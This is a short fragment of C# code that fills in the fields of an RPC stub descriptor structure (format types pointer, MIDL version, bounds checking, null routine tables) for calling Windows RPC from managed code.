        apfnExprEval = IntPtr.Zero;
        aXmitQuintuple = IntPtr.Zero;
        pFormatTypes = pFormatTypesPtr;
        fCheckBounds = 1;
        Version = 0x50002u;
        pMallocFreeStruct = IntPtr.Zero;
        MIDLVersion = 0x801026e;
        CommFaultOffsets = IntPtr.Zero;
        aUserMarshalQuadruple = IntPtr.Zero;
        NotifyRoutineTable = IntPtr.Zero;
        mFlags = new IntPtr(0x00000001);
        CsRoutineTables = IntPtr.Zero;
        ProxyServerInfo = IntPtr.Zero;
        pExprInfo = IntPtr.Zero;
    }
}
296 | }
297 |
--------------------------------------------------------------------------------